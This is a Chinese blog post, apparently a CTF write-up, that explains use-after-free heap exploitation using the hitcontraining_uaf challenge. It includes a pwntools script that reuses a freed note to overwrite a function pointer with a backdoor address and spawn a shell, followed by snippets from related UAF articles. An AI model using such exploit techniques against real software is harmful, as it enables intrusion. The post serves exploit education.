pwn-UAF漏洞

最新推荐文章于 2024-11-19 20:08:39 发布
最新推荐文章于 2024-11-19 20:08:39 发布
阅读量439 收藏 6
点赞数 6
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yufeiyu66/article/details/142437783

知识点

学到这里感觉学的很乱,感觉什么都要去了解,但是什么都不是很了解,可能学到后面的点把这些知识点串起来就好了吧。

UAF

use after free顾名思义就是在这个chunk被free后面进行利用

当一个chunk被free后,这个函数内部的数据不会马上清除,这些数据会被保留在原来的位置,然后这个chunk会被标记为free后,并且会根据chunk的大小被分到不同的bin中去,有(fastbin,unsorted bin,large bin…)这些bin就是以链表的形势把这些free后chunk链在一起

例题

下面以buu上面的hitcontraining_uaf进行说明

这个题目应该在glibc2.23环境中运行,但是这个题目大部分环境都可以打,就没改了

检查保护

请添加图片描述

ida打开

请添加图片描述

函数运行的时候会进行菜单选择

请添加图片描述

这里的delete函数中
请添加图片描述

这里可以看到free掉函数后面没有把函数的指针置零

因此这里存在漏洞

同时这个题目存在后门函数

请添加图片描述

先申请两个堆块

请添加图片描述
请添加图片描述

这个时候再free掉
请添加图片描述

请添加图片描述

free后面的bin

请添加图片描述

这个时候我们add(0x10,magic_addr)

请添加图片描述

因为在printf函数中是先申请note_list中的地址,在fastbin中(tcachebins)中也差不多,有着先进后出的规则,又因为bin中会把大小相似的的chunk再次申请,因此在chunk0的notelist是chunk2的notechunk(可以写入),所以我们调用chunk0中的printf函数就是调用了后门函数

exp

from pwn import*
r=process('./pwn')
gdb.attach(r)
pause()
def add(size,content):
  r.sendlineafter('choice :','1')
  r.sendlineafter('Note size :',str(size))
  r.sendlineafter('Content :',content)

def delete(idx):
  r.sendlineafter('choice :','2')
  r.sendlineafter('Index :',str(idx))

def printf(idx):
  r.sendlineafter('choice :','3')
  r.sendlineafter('Index :',str(idx))

shell_addr=0x8048945

add(48,'aaaa')
add(48,'bbbb')

delete(0)
delete(1)
add(8,p32(shell_addr))
printf(0)

r.interactive()
-yfy-
关注
UAF漏洞
m0_60584218的博客
02-27 2924
UAF漏洞 Use After Free 我们可以直接从字面上翻译它的意思:使用被释放的内存块。其实当一个内存块被释放之后重新使用有如下几种情况: 内存块被释放后,其对应的指针被设置为NULL,再次使用时程序会崩溃 内存块被释放后,其对应的指针没有被设置为NULL,在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序有可能可以正常运转 内存块被释放后,其对应的指针没有被设置为NULL,但是在下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能出现问题。 D
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 588
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
[CTF]PWN----UAF漏洞
2301_79880752的博客
03-08 2083
UAF即Use After Free简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况。。而我们一般所指的漏洞主要是后两种。此外,
pwn hacknote学习(UAF漏洞利用)
fanghuapyk的博客
12-01 3414
hacknote: uaf漏洞通常就是内存块被释放后,其对应的指针没有被置为NULL,然后在下一次使用前,有相应的代码对这块内存进行了修改,当程序再次使用相同的内存空间的时候,我们就能覆盖原来的地址,从而返回我们想要执行的函数的地址。 我们通常称释放后没有被置为NULL 指针为dangling pointer。 这里贴出源码: #include <stdio.h> #include &...
绿城杯uaf_pwn 分析
人饭子的博客
12-31 373
绿城杯uaf_pwn 分析 10月11日~10月15日 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。...
PWN知识点整理(2)UAF
qq_52469954的博客
10-28 430
UAF全称use after,其内容如名称,在free后再进行利用,UAF是堆结构漏洞的重要利用方式。
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1149
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
星盟-pwn-babyheap
qq_65147345的博客
08-01 317
1. 堆重叠获取libc_base地址 2. 使用unsorted attack更改global_max_fast,使chunk进入fastbin 3. 使用fastbin attack更改malloc_hook为one_gadget
pwn入门08---堆利用之uaf
weixin_45943522的博客
02-21 1594
use_after_free 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使
PWN -UAF(Use After Free)漏洞解析
m0_57836225的博客
11-19 1469
PWN 技术的持续学习旅程中,第 19 节聚焦于 UAF(Use After Free)这一关键概念。UAF 漏洞在安全领域,尤其是堆内存相关的攻防中占据重要地位。
Hacknote 一道简单的UAF漏洞
红叶的博客
03-09 486
看了大佬们的WP两天,勉强搞懂了原理。如有任何错误请在评论区指出。
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 3万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
pwnable.kr-uaf WP
Casuall的博客
06-22 574
UAF(Use After Free)释放后重用,其实是一种指针未置空造成的漏洞。 首先介绍一下迷途指针的概念 在计算机编程领域中,迷途指针,或称悬空指针、野指针,指的是不指向任何合法的对象的指针。 当所指向的对象被释放或者收回,但是对该指针没有作任何的修改,以至于该指针仍旧指向已经回收的内存地址,此情况下该指针便称迷途指针。若操作系统将这部分已经释放的内存重新分配给另外一个进程,而原来的程序重...
linux_pwn(1)--uaf
azraelxuemo的博客
03-04 1240
文章目录What is uafpwn题例题add函数show函数delete函数开始做题准备框架调试attackexp总结 What is uaf use after free 一般可能会有以下的场景 ptr=malloc(0x10) free(ptr) ptr-> 可能写代码不会出现这样的明显错误,但如果多文件呢?可能你这个地方释放了,其他地方还存在引用 所以项目中记住,free之后立刻ptr=NULL pwn题 在ctf里面,一般uaf出题模式就是 在bss开辟了区域,保存了每个heap的地址,
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2366
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
堆利用 UAF漏洞
m0_64195960的博客
05-16 819
buuctf上的easy_uaf漏洞
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8732
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SetupSTM32CubeMX-6.14.1-Win.exe
最新发布
07-04
SetupSTM32CubeMX-6.14.1-Win.exe
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值